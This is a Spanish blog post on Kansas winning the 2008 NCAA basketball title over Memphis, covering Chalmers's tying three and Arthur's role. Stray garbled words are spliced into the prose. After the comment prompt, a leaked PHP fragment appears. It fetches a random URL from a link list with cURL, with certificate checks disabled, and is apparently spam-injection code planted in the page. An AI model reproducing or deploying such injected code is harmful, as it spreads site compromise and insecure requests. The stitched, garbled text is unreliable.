Kansas alcanza el título de la NCAA

08 de April de 2008 por Dantley

El trabajo colectivo de Kansas venció a las individualidades de Memphis. Eso, y una pizca de suerte que ha acompañado a Kansas en momentos clave de los últimos kansasfanspartidos del campeonato.

El héroe del día es Chalmers, pero eso no es más que el fruto del habitual empecinamiento en buscar nombre y apellidos a las victorias de equipo. Si hubiese que buscar nombres y apellidos ésos habrían sido Chris Douglas-Roberts y Derrick Rose, pero lo trágico y lo mágico del deporte es que una simple acción cambia cualquier valoración. Los 39 partidos anteriores de Memphis con una sola derrota, la solvencia durante toda la March Madness, la explosión de Douglas-Roberts y Rose, no sirven de nada si, después de ir ganando por 9 puntos de diferencia a falta de poco más de dos minutos, en el último segundo uno de esos triples agónicos te envía a una prórroga en la que ya sabes que entras derrotado.

Kansas en el Elite Eight estuvo contra las cuerdas frente a Davidson. En aquel partido estuvo a un triple de Chris Richards de quedarse fuera. Ayer, en las mismas circunstancias mopchalmese triple fue suyo y entró. Más le duele a Memphis que antes de ese momento fallaron 4 de sus últimos 5 tiros libres. Simples detalles que dan y quitan la gloria de un título.

El partido no pasará a la historia por su calidad, como no lo hará la que se presumía una de las mejores Final Four de todos los tiempos. Kansas planteó el partido a pocos puntos y Memphis aceptó el reto. El partido fue discurriendo lento y con diferencias mínimas. Los grandes jugadores aparecían con cuentagotas. Memphis hizo un partido correcto, suficiente para ganar pero en el que fallaron esos fatídicos 2 minutos finales. El peor parado de Memphis fue Dorsey. En la final estuvo tan desconocido que anotó sus tres tiros pero se quedó en sólo 2 rebotes, arrollado por un interior con más recursos como Darrell Arthur. Aunque Chalmers fuera galardonado con el MOP –Most Outstanding Player- gracias al milagroso triple, fue Arthur el jugador que más contribuyó a la victoria de Kansas.

Kansas quizá no era el equipo que más talento ponía encima de la mesa para llevarse la Final Four pero sí quien supo utilizar sus armas y aprovechar los errores de sus rivales.

Ahora llegará la desbandada habitual de jugadores, muchos de ellos en su primer año de universidad. Para muchos – Rose con toda seguridad- llegarán tiempos mejores. Para los jugadores de Kansas este momento habrá sido el más brillante de sus carreras.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>